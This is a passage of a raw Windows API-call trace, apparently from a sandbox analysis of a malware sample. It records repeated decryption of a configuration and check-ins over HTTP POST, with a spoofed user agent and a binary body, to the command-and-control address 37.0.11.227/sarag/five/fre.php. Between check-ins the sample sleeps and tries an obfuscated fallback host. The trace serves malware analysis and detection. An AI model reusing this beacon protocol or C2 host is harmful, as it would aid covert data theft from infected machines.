1 [0217.234] GetProcessHeap () returned 0x690000 [0217.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.237] GetProcessHeap () returned 0x690000 [0217.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0217.237] GetProcessHeap () returned 0x690000 [0217.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0217.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.239] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.245] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0217.263] GetProcessHeap () returned 0x690000 [0217.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0217.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.265] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0217.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.268] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.269] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.269] GetProcessHeap () returned 0x690000 [0217.270] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0217.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.271] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0217.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.272] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.273] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0217.273] GetProcessHeap () returned 0x690000 [0217.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.275] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0217.276] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.276] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0217.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.277] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0217.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.280] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0217.280] GetProcessHeap () returned 0x690000 [0217.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0217.281] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0217.281] GetProcessHeap () returned 0x690000 [0217.281] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0217.281] socket (af=2, type=1, protocol=6) returned 0x548 [0217.281] connect (s=0x548, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0217.307] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0217.307] GetProcessHeap () returned 0x690000 [0217.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0217.307] GetProcessHeap () returned 0x690000 [0217.307] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0217.308] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.309] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.309] GetProcessHeap () returned 0x690000 [0217.309] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0217.309] GetProcessHeap () returned 0x690000 [0217.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.310] GetProcessHeap () returned 0x690000 [0217.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0217.310] GetProcessHeap () returned 0x690000 [0217.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0217.310] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.313] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.313] GetProcessHeap () returned 0x690000 [0217.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0217.313] GetProcessHeap () returned 0x690000 [0217.314] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.314] send (s=0x548, buf=0x6ab500*, len=242, flags=0) returned 242 [0217.315] send (s=0x548, buf=0x6aba40*, len=159, flags=0) returned 159 [0217.315] GetProcessHeap () returned 0x690000 [0217.315] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0217.315] recv (in: s=0x548, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0217.388] GetProcessHeap () returned 0x690000 [0217.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0217.389] GetProcessHeap () returned 0x690000 [0217.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0217.390] GetProcessHeap () returned 0x690000 [0217.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0217.390] GetProcessHeap () returned 0x690000 [0217.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0217.391] closesocket (s=0x548) returned 0 [0217.391] GetProcessHeap () returned 0x690000 [0217.391] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0217.391] GetProcessHeap () returned 0x690000 [0217.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.392] GetProcessHeap () returned 0x690000 [0217.392] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0217.392] GetProcessHeap () returned 0x690000 [0217.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0217.393] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xed4) returned 0x548 [0217.395] Sleep (dwMilliseconds=0xea60) [0217.396] GetProcessHeap () returned 0x690000 [0217.396] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0217.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.403] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0217.410] GetProcessHeap () returned 0x690000 [0217.410] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0217.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.412] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0217.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.413] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.414] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.414] GetProcessHeap () returned 0x690000 [0217.415] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0217.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.416] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0217.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.417] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.418] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0217.418] GetProcessHeap () returned 0x690000 [0217.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.420] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.421] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.422] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.426] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.426] GetProcessHeap () returned 0x690000 [0217.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0217.426] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.426] GetProcessHeap () returned 0x690000 [0217.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0217.427] GetProcessHeap () returned 0x690000 [0217.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.427] GetProcessHeap () returned 0x690000 [0217.427] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0217.428] GetProcessHeap () returned 0x690000 [0217.428] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0217.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.429] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.435] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0217.441] GetProcessHeap () returned 0x690000 [0217.441] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0217.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.443] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0217.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.444] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.445] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.445] GetProcessHeap () returned 0x690000 [0217.447] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0217.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.449] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0217.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.450] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.451] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0217.451] GetProcessHeap () returned 0x690000 [0217.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.452] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0217.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.453] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0217.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.454] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0217.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.455] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0217.455] GetProcessHeap () returned 0x690000 [0217.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0217.455] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0217.455] GetProcessHeap () returned 0x690000 [0217.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0217.455] socket (af=2, type=1, protocol=6) returned 0x54c [0217.456] connect (s=0x54c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0217.486] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0217.486] GetProcessHeap () returned 0x690000 [0217.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0217.486] GetProcessHeap () returned 0x690000 [0217.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0217.487] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.488] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.488] GetProcessHeap () returned 0x690000 [0217.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0217.488] GetProcessHeap () returned 0x690000 [0217.488] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.488] GetProcessHeap () returned 0x690000 [0217.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0217.488] GetProcessHeap () returned 0x690000 [0217.488] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0217.489] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0217.490] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.490] GetProcessHeap () returned 0x690000 [0217.490] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0217.490] GetProcessHeap () returned 0x690000 [0217.491] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0217.491] send (s=0x54c, buf=0x6ab500*, len=242, flags=0) returned 242 [0217.491] send (s=0x54c, buf=0x6aba40*, len=159, flags=0) returned 159 [0217.491] GetProcessHeap () returned 0x690000 [0217.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0217.491] recv (in: s=0x54c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0217.569] GetProcessHeap () returned 0x690000 [0217.569] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0217.570] GetProcessHeap () returned 0x690000 [0217.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0217.570] GetProcessHeap () returned 0x690000 [0217.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0217.570] GetProcessHeap () returned 0x690000 [0217.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0217.571] closesocket (s=0x54c) returned 0 [0217.571] GetProcessHeap () returned 0x690000 [0217.571] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0217.571] GetProcessHeap () returned 0x690000 [0217.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.572] GetProcessHeap () returned 0x690000 [0217.572] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0217.572] GetProcessHeap () returned 0x690000 [0217.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0217.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc1c) returned 0x54c [0217.575] Sleep (dwMilliseconds=0xea60) [0217.576] GetProcessHeap () returned 0x690000 [0217.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0217.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0217.644] GetProcessHeap () returned 0x690000 [0217.644] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0217.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.647] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0217.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.663] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.665] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.665] GetProcessHeap () returned 0x690000 [0217.665] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0217.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.667] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0217.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.668] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0217.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.669] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0217.669] GetProcessHeap () returned 0x690000 [0217.669] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0217.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.706] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.708] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.709] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0217.711] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.711] GetProcessHeap () returned 0x690000 [0217.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0217.711] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.712] GetProcessHeap () returned 0x690000 [0217.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0217.712] GetProcessHeap () returned 0x690000 [0217.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0217.713] GetProcessHeap () returned 0x690000 [0217.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0217.713] GetProcessHeap () returned 0x690000 [0217.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0217.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.725] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0217.746] GetProcessHeap () returned 0x690000 [0217.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0217.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0217.748] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 